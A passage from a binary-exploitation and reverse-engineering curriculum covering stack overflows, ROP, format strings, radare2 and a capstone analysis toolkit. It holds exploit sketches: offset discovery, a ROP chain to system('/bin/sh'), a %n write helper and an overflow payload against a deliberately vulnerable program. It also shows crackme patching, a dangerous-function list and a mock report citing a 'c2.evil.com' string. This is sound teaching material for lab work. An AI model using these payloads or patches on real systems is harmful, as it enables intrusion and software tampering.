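Finding the exact offset to the return address is usually done with a cyclic pattern. Below is a pure-Python sketch of what pwntools' `cyclic()`/`cyclic_find()` do; note the real pwntools version uses a de Bruijn sequence so *every* 4-byte window is unique, while this simplified version only guarantees uniqueness for aligned 4-byte chunks:

```python
# Generate a pattern of unique 4-letter chunks, feed it to the
# crashing input, then look up whatever 4 bytes landed in the saved
# return address to recover the offset.
from itertools import product
import string

def cyclic(length):
    alphabet = string.ascii_lowercase
    out = bytearray()
    for chunk in product(alphabet, repeat=4):
        out.extend("".join(chunk).encode())
        if len(out) >= length:
            return bytes(out[:length])
    raise ValueError("pattern space exhausted")

def cyclic_find(subseq, max_len=4096):
    return cyclic(max_len).find(subseq)

pattern = cyclic(200)            # send this as the overflowing input
# if the crash report shows the bytes b"aaac", the offset is:
offset = cyclic_find(b"aaac")    # -> 8 in this toy pattern
```

In practice you would just use `cyclic(200)` and `cyclic_find()` from pwntools itself; the point is that offset discovery is a lookup, not guesswork.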

2. **Return-Oriented Programming (ROP)**
   - When DEP/NX prevents shellcode execution, chain existing code fragments (gadgets)
   - Gadget: short instruction sequence ending in ret
   - ROP chain: sequence of addresses that performs desired operations

   *Guiding Questions:*
   - Why does ROP bypass DEP/NX?
   - How do you find gadgets in a binary?
   - What's the minimum set of gadgets needed for arbitrary code execution?

   *Book References:*
   - "Hacking: The Art of Exploitation" by Jon Erickson - Ch 0x300 (advanced exploitation)
   - "The Shellcoder's Handbook" - Ch on ROP techniques
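Concretely, a ROP chain is nothing more than packed little-endian addresses placed where the saved return address used to be. A minimal sketch (all addresses below are made-up placeholders, not from any real binary):

```python
# system("/bin/sh") via two "returns": the first gadget pops the
# argument into RDI (first argument register on x86-64), then the
# CPU "returns" into system().
import struct

def p64(value):
    return struct.pack("<Q", value)   # 8-byte little-endian

POP_RDI_RET = 0x401234        # hypothetical gadget: pop rdi; ret
BIN_SH      = 0x7f0000001000  # hypothetical address of "/bin/sh" string
SYSTEM      = 0x7f00000529c0  # hypothetical address of system()

chain = p64(POP_RDI_RET) + p64(BIN_SH) + p64(SYSTEM)
payload = b"A" * 72 + chain   # 72 = 64-byte buffer + 8-byte saved RBP
```

Each `ret` pops the next 8 bytes into RIP, so the stack itself becomes the "program" the gadgets execute.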

3. **Format String Vulnerabilities**
   - printf(user_input) allows reading/writing arbitrary memory
   - %x reads stack, %n writes to addresses, %s dereferences pointers
   - Exploitation: leak addresses, overwrite GOT entries, arbitrary write

   *Guiding Questions:*
   - How does %n write to memory in printf?
   - How do you calculate the offset to your format string on the stack?
   - Why are format strings more powerful than buffer overflows?

   *Book References:*
   - "Hacking: The Art of Exploitation" by Jon Erickson - Ch 0x300: Format strings
   - "The Shellcoder's Handbook" - Format string chapter
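The `%n` mechanic above is pure counting: `%n` stores the number of characters printed so far, so writing a value means printing exactly that many characters first. A sketch of the arithmetic for a single-byte (`%hhn`) write; the argument index and stack layout are target-specific, so treat this as the calculation only:

```python
# Build the "%<pad>c%<idx>$hhn" fragment that writes one byte.
# chars_already_printed = bytes emitted before this fragment
# (e.g. the target addresses placed at the start of the payload).
def fmt_byte_write(value, arg_index, chars_already_printed):
    pad = (value - chars_already_printed) % 256
    if pad == 0:
        pad = 256   # "%0c" prints nothing, so wrap a full byte instead
    return f"%{pad}c%{arg_index}$hhn".encode()
```

pwntools automates this whole dance (including multi-byte writes) with `fmtstr_payload`, but knowing the counting rule is what lets you debug it when the automated payload misbehaves.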

4. **Memory Protections (ASLR, DEP, Stack Canaries, PIE)**
   - ASLR: randomizes addresses, defeats hardcoded exploits
   - DEP/NX: prevents code execution on stack/heap
   - Stack canaries: detect buffer overflows before return
   - PIE: code section also randomized

   *Guiding Questions:*
   - How do you bypass ASLR? (information leak + relative addressing)
   - What happens when a canary is overwritten?
   - Can you bypass all protections simultaneously?

   *Book References:*
   - "Practical Binary Analysis" by Dennis Andriesse - Ch 1: Security mechanisms
   - "Hacking: The Art of Exploitation" by Jon Erickson - Ch 0x500: Shellcode

5. **Heap Exploitation Basics**
   - Heap allocators (malloc/free) have exploitable metadata
   - Use-after-free: accessing freed memory
   - Double-free: freeing same pointer twice
   - Heap overflow: overwriting heap metadata

   *Guiding Questions:*
   - How does malloc/free work internally?
   - What is a heap chunk header?
   - What's the difference between fastbin, smallbin, largebin?

   *Book References:*
   - "The Shellcoder's Handbook" - Heap exploitation chapters
   - Research papers on heap exploitation techniques

6. **Pwntools and Exploit Development Workflow**
   - Pwntools: Python library for exploit development
   - Workflow: analyze binary → find vulnerability → develop exploit → test locally → remote exploitation
   - Automation: template scripts, reusable patterns

   *Guiding Questions:*
   - How do you interact with remote services in pwntools?
   - What's the benefit of Python for exploit development?
   - How do you debug exploits that work locally but fail remotely?

   *Book References:*
   - Pwntools documentation
   - "CTF Field Guide" (Trail of Bits)

### Questions to Guide Your Design

1. **Which platform to start?** pwnable.kr (beginner), ROP Emporium (ROP focus), or picoCTF (educational)?

2. **Systematic vs opportunistic learning?** Follow structured curriculum or jump to interesting challenges?

3. **Template library strategy?** Create reusable exploit patterns or write from scratch each time?

4. **How do you document solutions?** Writeups for each challenge? Annotated exploit code?

5. **Local vs remote testing?** Set up Docker containers locally or test directly on remote services?

6. **Tool choices?** GDB with pwndbg/gef, radare2, or IDA for analysis?

7. **Collaboration approach?** Solo learning or team/community collaboration?

8. **How do you handle getting stuck?** Time-box before looking at hints/writeups?

### Thinking Exercise

**Before coding exploits, complete this analysis exercise:**

1. **Analyze this vulnerable code:**
   ```c
   #include <stdio.h>
   #include <stdlib.h>

   void win() {
       system("/bin/sh");
   }

   void vuln() {
       char buffer[64];
       gets(buffer);  // Vulnerable!
   }

   int main() {
       vuln();
       return 0;
   }
   ```

2. **Manual exploitation steps:**
   - Compile with `gcc -o vuln vuln.c -fno-stack-protector -no-pie`
   - Disassemble and find the address of `win()`
   - Calculate the offset from `buffer` to the return address (64-byte buffer + 8-byte saved RBP = 72 bytes)
   - Craft the payload: padding + `win` address
   - Test locally: `python3 -c 'import sys; sys.stdout.buffer.write(b"A"*72 + b"ABCD")' | ./vuln` (a segfault confirms control of the return address; then substitute the real `win` address, packed little-endian)

3. **Document:**
   - Vulnerability type: Stack buffer overflow
   - Protections disabled: No canary, no PIE
   - Win condition: Call the `win()` function
   - Exploitation technique: Overwrite the return address
   - Payload structure: `[padding][win_address]`

The Interview Questions They’ll Ask

  1. “Walk me through exploiting a basic stack buffer overflow.”
    • Find overflow, calculate offset to return address, overwrite with target address (shellcode or win function).
  2. “What’s the difference between exploiting 32-bit vs 64-bit binaries?”
    • x86: args on stack. x86-64: args in registers (rdi, rsi, rdx…). Pointers 8 bytes vs 4. Different calling conventions.
  3. “Explain Return-Oriented Programming.”
    • Chain gadgets (code ending in ret) to perform operations when NX prevents shellcode. Each gadget address on stack acts as return address.
  4. “How do you bypass ASLR?”
    • Leak an address (format string, buffer over-read), calculate base from leak, use relative offsets.
  5. “What’s a format string vulnerability and why is it powerful?”
    • printf(user_input) allows reading stack (%x) and writing memory (%n). Can leak addresses and modify GOT/function pointers.
  6. “Explain stack canaries. How do you bypass them?”
    • Random value placed before return address. Checked on return. Bypass: leak canary value, preserve it in overflow.
  7. “What’s a GOT overwrite and when is it useful?”
    • Global Offset Table holds addresses of library functions. Overwrite entry to hijack function calls. Useful when you can’t directly control execution.
  8. “Describe a use-after-free vulnerability.”
    • Accessing freed memory. Allocate new object in same location, old pointer now references new object. Type confusion or data leak.
  9. “What tools do you use for binary exploitation?”
    • pwntools (exploit development), GDB with pwndbg/gef (debugging), ROPgadget/ropper (gadget finding), checksec (protection checking).
  10. “What’s your methodology for approaching a new CTF pwn challenge?”
    • Check protections → run binary → analyze in debugger → identify vulnerability → develop exploit locally → adapt for remote.

Books That Will Help

| Topic | Book | Chapters |
| --- | --- | --- |
| Exploitation Fundamentals | “Hacking: The Art of Exploitation” by Jon Erickson | Ch 0x300: Exploitation; Ch 0x500: Shellcode |
| System Internals | “Computer Systems: A Programmer’s Perspective” by Bryant & O’Hallaron | Ch 3: Machine-Level Representation; Ch 7: Linking |
| Binary Analysis | “Practical Binary Analysis” by Dennis Andriesse | Ch 1: Anatomy of a Binary; Ch 6: Binary Analysis Fundamentals |
| Assembly Language | “Low-Level Programming” by Igor Zhirkov | Ch 4-5: Assembly and Control Flow |
| Advanced Exploitation | “The Shellcoder’s Handbook” | ROP, Format Strings, Heap Exploitation chapters |
| Practical Guides | “CTF Field Guide” (Trail of Bits) | Available online |
| CTF Walkthroughs | “Nightmare” (guyinatuxedo) | Comprehensive CTF solutions, available on GitHub |

Project 17: radare2 Mastery

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: r2 commands, r2pipe (Python)
  • Alternative Programming Languages: JavaScript (r2js)
  • Coolness Level: Level 4: Hardcore Tech Flex
  • Business Potential: 1. The “Resume Gold”
  • Difficulty: Level 2: Intermediate
  • Knowledge Area: Static Analysis / Command Line RE
  • Software or Tool: radare2, Cutter (GUI)
  • Main Book: “The radare2 Book”

What you’ll build: Complete analysis of binaries using only radare2’s command-line interface, plus automation with r2pipe.

Why it teaches binary analysis: radare2 is the most powerful open-source RE framework. Its CLI forces you to think about what you’re doing.

Core challenges you’ll face:

  • Command syntax → maps to steep learning curve
  • Navigation → maps to moving through binaries
  • Visual mode → maps to interactive disassembly
  • Scripting → maps to r2pipe automation

Resources for key challenges:

Key Concepts:

  • Command Structure: radare2 book
  • Visual Mode: V and VV commands
  • r2pipe: Python bindings documentation

Difficulty: Intermediate
Time estimate: 2-3 weeks
Prerequisites: Projects 1-4

Real world outcome:

Deliverables:

  • Analysis output or tooling scripts
  • Report with control/data flow notes

Validation checklist:

  • Parses sample binaries correctly
  • Findings are reproducible in debugger
  • No unsafe execution outside lab

```bash
$ r2 ./crackme
[0x00401040]> aaa                      # Analyze all
[0x00401040]> afl                      # List functions
0x00401040    1 43   entry0
0x00401170    4 101  main
0x004011e0    3 67   sym.check_password

[0x00401040]> s main                   # Seek to main
[0x00401170]> pdf                      # Print function disassembly
            ; CODE XREF from entry0
┌ 101: int main (int argc, char **argv);
│           0x00401170      push rbp
│           0x00401171      mov rbp, rsp
│           0x00401174      sub rsp, 0x40
│           ...
│           0x004011a0      call sym.check_password
│       ┌─< 0x004011a5      test eax, eax
│       │   0x004011a7      je 0x4011b8
│       │   0x004011a9      lea rdi, str.Correct
│       │   0x004011b0      call sym.imp.puts

[0x00401170]> VV                       # Visual graph mode
[0x00401170]> s sym.check_password
[0x004011e0]> pdc                      # Decompile (with r2ghidra)

int check_password(char *input) {
    return strcmp(input, "s3cr3t") == 0;
}

# r2pipe automation
$ python3
>>> import r2pipe
>>> r2 = r2pipe.open('./crackme')
>>> r2.cmd('aaa')
>>> functions = r2.cmdj('aflj')        # JSON output
>>> for f in functions:
...     print(f['name'], hex(f['offset']))
```

Implementation Hints:

Essential r2 commands:

# Analysis
aaa              # Analyze all
afl              # List functions
axt addr         # Xrefs to address
axf addr         # Xrefs from address
iz               # List strings
ii               # List imports

# Navigation
s addr           # Seek to address
s main           # Seek to function
sf               # Seek to next function
sb               # Seek to previous function

# Disassembly
pd 20            # Print 20 instructions
pdf              # Print function disassembly
pdc              # Pseudo-decompile (with plugins)
pdr              # Print function disassembly recursively (follow basic blocks)

# Visual mode
V                # Visual mode (press p to cycle views)
VV               # Visual graph mode
Vp               # Visual panel mode

# Debugging
db addr          # Set breakpoint
dc               # Continue
ds               # Step
dr               # Show registers
doo              # Reopen for debugging

# Patching
wa nop           # Write assembly (nop)
wx 90            # Write hex bytes

Common workflows:

  1. aaa; afl - Analyze and list functions
  2. iz; iz~password - Find interesting strings
  3. axt str.password - Find references to string
  4. s ref; pdf - Go to reference, disassemble

Learning milestones:

  1. Basic navigation → Move around binaries
  2. Visual mode → Efficient analysis
  3. Find vulnerabilities → Locate interesting code
  4. Automate with r2pipe → Script your analysis

The Core Question You’re Answering

How do you efficiently analyze and reverse engineer binaries using only a command-line interface, and why is mastering text-based tools essential for professional reverse engineering work?

This project challenges you to think beyond GUI tools and understand reverse engineering at a fundamental level. When you can’t rely on visual cues and mouse clicks, you’re forced to understand the underlying concepts, develop systematic workflows, and build automation that scales to hundreds of binaries.

Concepts You Must Understand First

1. Command-Line Philosophy and UNIX Composability

  • radare2 follows the UNIX philosophy: small, composable commands that do one thing well
  • Understanding why ~ (internal grep), | (pipe to shell), and @ (temporary seek) exist
  • The power of combining simple commands to create complex analysis workflows

Guiding Questions:

  • Why does radare2 use single-letter commands instead of descriptive names?
  • How does the command prefix system (a=analysis, p=print, d=debug) help organize functionality?
  • What’s the advantage of pdf @ sym.main vs seeking to main first?

Book References:

  • “The radare2 Book” (online) - Chapter 1: Introduction, Chapter 4: Basic Usage
  • “The Art of UNIX Programming” by Eric S. Raymond - Chapter 1: Philosophy

2. Binary Analysis State and Context

  • Understanding the current seek position (like a cursor in your binary)
  • How radare2 maintains analysis state (function boundaries, cross-references, types)
  • The difference between ephemeral commands and persistent state changes

Guiding Questions:

  • What’s the difference between s main and @ main in terms of state?
  • How does aaa (analyze all) build the function database, and when should you use aa vs aaa vs aaaa?
  • Why might you want to save a project (Ps) instead of re-analyzing each time?

Book References:

  • “The radare2 Book” - Chapter 4: Basic Usage (Seeking and Navigation)
  • “Practical Binary Analysis” by Dennis Andriesse - Chapter 5: Basic Binary Analysis

3. Visual Mode as Interactive Disassembly

  • Visual mode (V) isn’t just pretty printing—it’s an interactive analysis workspace
  • Understanding the different visual panels (hex, disassembly, graph, debugging)
  • How visual mode keybindings map to command-line operations

Guiding Questions:

  • What’s the relationship between pressing p in visual mode and the pd command?
  • How does VV (visual graph mode) help you understand control flow better than linear disassembly?
  • When would you use visual panel mode (V!) with multiple panes?

Book References:

  • “The radare2 Book” - Chapter 6: Visual Mode
  • “Reversing: Secrets of Reverse Engineering” by Eldad Eilam - Chapter 4: Reverse Engineering

4. Cross-References and Program Flow

  • Cross-references (xrefs) are the roadmap of your binary—who calls what
  • Understanding axt (xrefs to) vs axf (xrefs from) vs ax (list all)
  • How to trace data flow and control flow through xref analysis

Guiding Questions:

  • If you find an interesting string, how do you find all code that uses it?
  • How do you determine if a function is called from multiple places or just one?
  • What’s the difference between code xrefs and data xrefs?

Book References:

  • “The radare2 Book” - Chapter 5: Analysis (Cross-References section)
  • “Practical Binary Analysis” by Dennis Andriesse - Chapter 6: Disassembly and Binary Analysis

5. r2pipe and Programmatic Analysis

  • r2pipe lets you control radare2 from any programming language
  • Understanding the JSON output mode (j suffix) for machine parsing
  • Building analysis pipelines that scale to multiple binaries

Guiding Questions:

  • Why would you use r2.cmdj('aflj') instead of parsing text output from afl?
  • How can you build a script that finds all functions using dangerous functions like strcpy?
  • What’s the advantage of r2pipe over scraping radare2 text output?

Book References:

  • “The radare2 Book” - Chapter 15: r2pipe
  • “Practical Binary Analysis” by Dennis Andriesse - Chapter 12: Principles of Dynamic Analysis

6. Binary Patching and Modification

  • Understanding the difference between wa (write assembly), wx (write hex), and wao (write operation)
  • How to patch binaries in-place and save changes with wc (write cache)
  • The concept of reversible vs permanent patches

Guiding Questions:

  • How do you NOP out a conditional jump to bypass a check?
  • What’s the difference between patching in-memory vs writing changes to disk?
  • How do you ensure your patch doesn’t break relocations or other code?

Book References:

  • “The radare2 Book” - Chapter 8: Writing and Patching
  • “Hacking: The Art of Exploitation” by Jon Erickson - Chapter 5: Exploitation

7. Analysis Automation with r2 Scripts

  • r2 scripts (.r2 files) let you automate repetitive analysis tasks
  • Understanding how to combine commands with ; and create macros
  • Building reusable analysis workflows

Guiding Questions:

  • How do you create a script that automatically finds and patches anti-debugging checks?
  • What’s the difference between running a script with . vs sourcing commands?
  • How can you make your analysis reproducible for team members?

Book References:

  • “The radare2 Book” - Chapter 14: Scripting
  • “Practical Binary Analysis” by Dennis Andriesse - Chapter 13: Binary Instrumentation

Questions to Guide Your Design

  1. Command Discovery: How will you learn and remember the hundreds of radare2 commands? Should you create personal cheat sheets, use ? help extensively, or build muscle memory through repetition?

  2. Workflow Efficiency: What’s your standard workflow for analyzing a new binary? Do you start with aaa, then afl, then investigate interesting functions? Or do you prefer a different sequence?

  3. Visual vs Command-Line: When should you use visual mode vs staying in command-line mode? Is visual mode just for beginners, or does it offer unique insights?

  4. Scripting Strategy: Which analysis tasks should you automate with r2pipe vs do manually? At what point does scripting become more efficient than interactive analysis?

  5. Plugin Ecosystem: Should you rely on plugins like r2ghidra (decompiler) and r2dec, or stick to core radare2 functionality? How do plugins affect reproducibility?

  6. Collaborative Analysis: How do you share your radare2 analysis with team members? Do you save projects, export commands, or create scripts?

  7. Integration with Other Tools: How should radare2 fit into your overall RE workflow? Should it complement Ghidra/IDA, or can it be your primary tool?

  8. Learning Curve Management: radare2 is notoriously difficult to learn. How will you structure your learning to avoid frustration—start with small binaries, follow tutorials, or dive into complex samples?

Thinking Exercise

Exercise 1: Manual Command Reconstruction Before using visual mode, analyze a simple crackme using only command-line mode:

  1. Open the binary: r2 ./crackme
  2. Run analysis: aaa
  3. List functions: afl - identify main and other interesting functions
  4. Seek to main: s main
  5. Print disassembly: pdf
  6. Find string references: iz then axt str.password
  7. Navigate to the xref: s [address]
  8. Trace the check logic without using visual mode

Reflection: Which commands did you use most? What was frustrating? How would you optimize this workflow?

Exercise 2: Visual Mode Mapping In visual mode, press different keys and observe what happens:

  1. Enter visual mode: V
  2. Press p repeatedly - note each view (hex, disasm, debug, words, etc.)
  3. Press ? - study the help screen
  4. In graph mode (VV), navigate with hjkl and tab through nodes
  5. Return to command mode with q, then recreate one visual operation using CLI commands

Reflection: Which visual mode do you prefer? Can you recreate visual graph mode insights using pdf and agf?

Exercise 3: r2pipe Automation Planning Manually perform this analysis, then plan how to automate it:

Task: Find all functions that call dangerous functions (strcpy, gets, sprintf)

Manual steps:

r2 ./binary
aaa
afl
s sym.imp.strcpy
axt
# repeat for each dangerous function

Automation plan:

  • What JSON commands will you need? (aflj, axtj)
  • How will you iterate through dangerous functions?
  • What output format will be most useful?
  • Write pseudocode before writing Python
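One possible shape for the Exercise 3 automation (assumes radare2 and r2pipe are installed; `sym.imp.<name>` follows r2's import-naming convention). The report builder is kept pure so it can be tested without radare2:

```python
# Find all callers of dangerous libc functions via r2pipe.
DANGEROUS = ["strcpy", "gets", "sprintf"]

def build_report(xrefs_by_func):
    # xrefs_by_func: {"gets": [{"fcn_name": "main", "from": 0x401150}, ...]}
    report = []
    for name, xrefs in xrefs_by_func.items():
        for x in xrefs:
            report.append((x.get("fcn_name", "?"), name, x["from"]))
    return sorted(report)

def scan(path):
    import r2pipe                      # external dependency
    r2 = r2pipe.open(path)
    r2.cmd("aaa")                      # analyze everything first
    xrefs = {}
    for name in DANGEROUS:
        # axtj = "xrefs to" as JSON; empty if the import is absent
        xrefs[name] = r2.cmdj(f"axtj @ sym.imp.{name}") or []
    return build_report(xrefs)
```

Sorting by containing function gives you a triage list: every `(function, dangerous_call, address)` triple is a place to inspect with `pdf`.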

Exercise 4: Binary Patching Practice Find a simple crackme with a password check and practice patching:

  1. Locate the comparison: look for cmp or test before a conditional jump
  2. Understand the logic: does it jump if correct or if incorrect?
  3. Plan your patch: should you NOP the jump, change the condition, or modify the comparison?
  4. Apply the patch: use wa or wx
  5. Verify in-memory: use pd to see your changes
  6. Test: run with ood (open in debug mode)
  7. Save permanently: use wc [filename] (write changes)

Reflection: Did your first patch work? What did you learn about instruction lengths and side effects?

The Interview Questions They’ll Ask

Technical Understanding:

  1. Q: Explain the difference between aa, aaa, and aaaa in radare2. When would you use each? A: They perform progressively deeper analysis: aa does basic analysis (functions, xrefs), aaa adds deeper analysis including strings and function arguments, aaaa is even more aggressive. Use aa for quick checks, aaa for normal analysis, and aaaa when comprehensive analysis is needed.

  2. Q: How would you find all calls to strcpy in a binary using radare2? A: Run aaa to analyze, afl~strcpy to check if it’s imported, s sym.imp.strcpy to seek to it, then axt to find all cross-references (calls) to strcpy. Or use r2pipe: r2.cmdj('axtj @ sym.imp.strcpy') for JSON output.

  3. Q: What’s the purpose of the @ operator in radare2 commands? A: The @ operator performs a temporary seek. For example, pdf @ sym.main prints the disassembly of main without changing your current seek position. It’s essential for scripting and avoiding state changes.

  4. Q: How do you patch a binary in radare2 and save the changes permanently? A: Use wa (write assembly) or wx (write hex bytes) to modify in memory, then wc [filename] to write changes to a new file. You can also use oo+ (open in write mode) to modify the original.

  5. Q: Explain the different visual modes in radare2 and when you’d use each. A: V enters visual hex/disassembly (press p to cycle views), VV shows the graph view (control flow), V! enters panel mode (multiple panes). Use hex view for raw bytes, disassembly for linear code, graph for understanding flow, and panels for debugging.

Practical Application:

  1. Q: You’re analyzing a stripped binary with no symbols. How would you find the main function in radare2? A: Run aaa, then s entry0 to go to the entry point, pdf to see the code, look for the call to __libc_start_main which takes main as the first argument (in RDI on x64). Use the disassembly to trace the argument.

  2. Q: How would you use r2pipe to automatically analyze 100 binaries and find which ones have NX disabled? A: Write a Python script that opens each binary with r2pipe.open(), runs iI (binary info), parses the JSON output with cmdj('iIj'), checks the nx field, and logs results.

  3. Q: A binary crashes when you run it. How do you use radare2 to investigate without executing it? A: Open without execution: r2 ./binary (not r2 -d), run aaa for static analysis, find likely crash points (maybe invalid instruction or null pointer dereference), use pdf to understand context. For dynamic analysis, use doo (reopen in debug mode) and set breakpoints before the crash.
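The batch-audit workflow from Q2 can be sketched as below. The r2pipe driver assumes radare2 and the r2pipe package are installed, so the NX check itself is factored into a pure function over the JSON text that `iIj` produces (the `nx` field name is how radare2 reports it):

```python
import json

def has_nx_disabled(info_json: str) -> bool:
    """Given JSON text from radare2's `iIj` command, return True
    if the binary lacks NX (i.e. its stack is executable)."""
    info = json.loads(info_json)
    # Treat a missing field as "not protected" so it gets flagged.
    return not info.get("nx", False)

def check_binaries(paths):
    """Hypothetical r2pipe driver (requires radare2 installed)."""
    import r2pipe  # deferred import keeps the check above testable
    flagged = []
    for path in paths:
        r2 = r2pipe.open(path)
        if has_nx_disabled(r2.cmd("iIj")):
            flagged.append(path)
        r2.quit()
    return flagged
```

Keeping the JSON logic out of the r2pipe loop means the interesting part can be unit-tested without radare2 present.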

Tool Comparison:

  1. Q: When would you choose radare2 over Ghidra or IDA Pro? A: radare2 excels in: automation via r2pipe, command-line environments (servers, CTFs), binary patching, custom analysis scripts, and open-source requirements. Ghidra is better for decompilation and collaborative projects. IDA has better disassembly quality and commercial support.

  2. Q: How do you use radare2’s JSON output mode, and why is it important? A: Append j to most commands: aflj (functions as JSON), iIj (binary info), axtj (xrefs). This is crucial for r2pipe scripting because parsing JSON is reliable, while parsing text output is fragile.

Books That Will Help

| Topic | Book | Chapters | Why It Helps |
|-------|------|----------|--------------|
| radare2 Fundamentals | “The radare2 Book” (online) | Ch 1-8: Introduction through Patching | Official documentation, comprehensive command reference, essential for learning the tool |
| Command-Line Philosophy | “The Art of UNIX Programming” by Eric S. Raymond | Ch 1: Philosophy, Ch 11: Interfaces | Understand why radare2 is designed the way it is - composable, text-based, scriptable |
| Binary Analysis Concepts | “Practical Binary Analysis” by Dennis Andriesse | Ch 5-6: Basic Binary Analysis, Disassembly | Context for what you’re analyzing - radare2 is the tool, this book explains the concepts |
| Disassembly Fundamentals | “Computer Systems: A Programmer’s Perspective” by Bryant & O’Hallaron | Ch 3: Machine-Level Programming | Understanding what you’re seeing in pdf output - instruction encoding, calling conventions |
| Reverse Engineering Workflow | “Reversing: Secrets of Reverse Engineering” by Eldad Eilam | Ch 4-5: Reverse Engineering, Reversing Tools | Learn systematic RE approaches that you’ll implement in radare2 |
| r2pipe Programming | “The radare2 Book” | Ch 15: r2pipe | Learn to automate radare2 with Python, JavaScript, or other languages |
| Binary Patching | “Hacking: The Art of Exploitation” by Jon Erickson | Ch 5: Exploitation (patching sections) | Understand when and how to modify binaries using radare2’s write commands |
| x86-64 Assembly | “Low-Level Programming” by Igor Zhirkov | Ch 5-8: Assembly Programming | Read disassembly fluently - understand what mov rdi, rsp means in context |
| Control Flow Analysis | “Practical Binary Analysis” by Dennis Andriesse | Ch 6: Binary Analysis (CFG section) | Understand what VV graph mode is showing you - basic blocks, edges, loops |
| Dynamic Analysis Integration | “Practical Malware Analysis” by Sikorski & Honig | Ch 9: Dynamic Analysis | Learn when to use radare2’s debugger (ood, dc, ds) vs static analysis |


Project 18: Complete Binary Analysis Toolkit

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: Python
  • Alternative Programming Languages: Rust, C
  • Coolness Level: Level 5: Pure Magic (Super Cool)
  • Business Potential: 4. The “Open Core” Infrastructure
  • Difficulty: Level 5: Master
  • Knowledge Area: Tool Development / Complete Framework
  • Software or Tool: Your previous projects
  • Main Book: All previous books

What you’ll build: A unified toolkit combining your ELF/PE parser, disassembler, analyzer, and exploit helpers into one professional tool.

Why it teaches binary analysis: Building professional tools requires integrating all your knowledge into a cohesive system.

Core challenges you’ll face:

  • Clean architecture → maps to modular, extensible design
  • User experience → maps to helpful output, good CLI
  • Integration → maps to combining all components
  • Documentation → maps to making it usable

Time estimate: 2-3 months Prerequisites: All previous projects

Real world outcome:

Deliverables:

  • Analysis output or tooling scripts
  • Report with control/data flow notes

Validation checklist:

  • Parses sample binaries correctly
  • Findings are reproducible in debugger
  • No unsafe execution outside lab

```bash
$ binkit analyze ./suspicious
╔══════════════════════════════════════════════════════════════╗
║                    Binary Analysis Report                    ║
╠══════════════════════════════════════════════════════════════╣
║ File:     suspicious                                         ║
║ Format:   ELF64                                              ║
║ Arch:     x86-64                                             ║
║ Compiler: GCC 11.2.0                                         ║
╠══════════════════════════════════════════════════════════════╣
║ Security                                                     ║
╠══════════════════════════════════════════════════════════════╣
║ RELRO:        Full RELRO ✓                                   ║
║ Stack Canary: Found ✓                                        ║
║ NX:           Enabled ✓                                      ║
║ PIE:          Enabled ✓                                      ║
║ Fortify:      Enabled ✓                                      ║
╠══════════════════════════════════════════════════════════════╣
║ Vulnerabilities                                              ║
╠══════════════════════════════════════════════════════════════╣
║ ⚠ gets() called at 0x401234 - Buffer overflow risk           ║
║ ⚠ strcpy() called at 0x401456 - No bounds checking           ║
║ ⚠ Format string at 0x401567 - printf(user_input)             ║
╠══════════════════════════════════════════════════════════════╣
║ Interesting Strings                                          ║
╠══════════════════════════════════════════════════════════════╣
║ 0x402000: "/bin/sh"                                          ║
║ 0x402008: "http://c2.evil.com"                               ║
║ 0x402020: "password123"                                      ║
╠══════════════════════════════════════════════════════════════╣
║ Exploit Template                                             ║
╠══════════════════════════════════════════════════════════════╣
║ Generated: exploit_suspicious.py                             ║
║ Target:    gets() overflow at 0x401234                       ║
║ Strategy:  ROP chain to system("/bin/sh")                    ║
╚══════════════════════════════════════════════════════════════╝

$ binkit disasm 0x401234 20
0x00401234:  48 89 e7         mov  rdi, rsp
0x00401237:  e8 c4 fe ff ff   call 0x401100  ; gets@plt
0x0040123c:  48 85 c0         test rax, rax
...

$ binkit exploit ./suspicious --output pwn.py
[*] Generating exploit template...
[*] Found gets() vulnerability at 0x401234
[*] ROP gadgets found: 15
[*] Exploit written to pwn.py
[*] Run with: python3 pwn.py
```

**Implementation Hints**:

Architecture:

```
binkit/
├── core/
│   ├── parser.py      # ELF/PE parsing (Project 1-2)
│   ├── disasm.py      # Disassembly (Project 3)
│   └── analyzer.py    # Vulnerability detection
├── exploit/
│   ├── rop.py         # ROP chain builder
│   ├── shellcode.py   # Shellcode generation
│   └── templates/     # Exploit templates
├── output/
│   ├── console.py     # Pretty printing
│   └── report.py      # Report generation
└── cli.py             # Command-line interface
```


Features to implement:
1. Auto-detect file format
2. Security check (like checksec)
3. Vulnerability scanning
4. ROP gadget finder
5. Exploit template generator
6. Report generation
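As a sketch of feature 3 (vulnerability scanning), one simple first pass is matching imported symbol names against a severity-ranked deny list. The list and severities below are illustrative, not exhaustive:

```python
# Severity ratings for risky libc imports (illustrative list).
DANGEROUS_IMPORTS = {
    "gets": "critical",      # no bounds check at all
    "strcpy": "high",        # unbounded copy
    "sprintf": "high",       # unbounded format write
    "system": "medium",      # command injection risk
    "strncpy": "low",        # bounded, but may not NUL-terminate
}

SEVERITY_RANK = {"critical": 0, "high": 1, "medium": 2, "low": 3}

def scan_imports(imports):
    """Return one finding per dangerous imported symbol,
    most severe first."""
    findings = [
        {"symbol": name, "severity": DANGEROUS_IMPORTS[name]}
        for name in imports
        if name in DANGEROUS_IMPORTS
    ]
    findings.sort(key=lambda f: SEVERITY_RANK[f["severity"]])
    return findings
```

A real scanner would go further (cross-references, reachability), but import matching is a useful, cheap baseline.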

**Learning milestones**:
1. **Integrate parsers** → Support ELF and PE
2. **Add analysis** → Vulnerability detection
3. **Build CLI** → User-friendly interface
4. **Generate exploits** → Automated template creation

### The Core Question You're Answering

**How do you architect a comprehensive binary analysis framework that integrates parsing, disassembly, vulnerability detection, and exploit generation into a cohesive, professional tool?**

This capstone project synthesizes everything you've learned across 17 projects into a unified toolkit. You'll confront the challenges of software architecture, API design, user experience, and maintainability—the same challenges faced by teams building tools like Binary Ninja, Ghidra, and radare2.

### Concepts You Must Understand First

**1. Modular Architecture and Plugin Systems**
- Separating concerns into core functionality, plugins, and user interface layers
- Designing extensible APIs that allow new file formats and analysis techniques
- Understanding dependency injection and inversion of control patterns

*Guiding Questions:*
- How do you make your ELF/PE parsers swappable without changing the analyzer code?
- What interface should a "file format parser" plugin implement?
- How can you support future formats (Mach-O, WASM) without rewriting existing code?

*Book References:*
- "Clean Architecture" by Robert C. Martin - Chapter 20-22: Architecture Patterns
- "Design Patterns" by Gang of Four - Chapter 5: Behavioral Patterns (Strategy, Observer)
- "Practical Binary Analysis" by Dennis Andriesse - Chapter 9: Binary Analysis in Practice

**2. Command-Line Interface Design**
- Creating intuitive, composable CLI commands that feel natural to users
- Balancing power-user features with beginner-friendly defaults
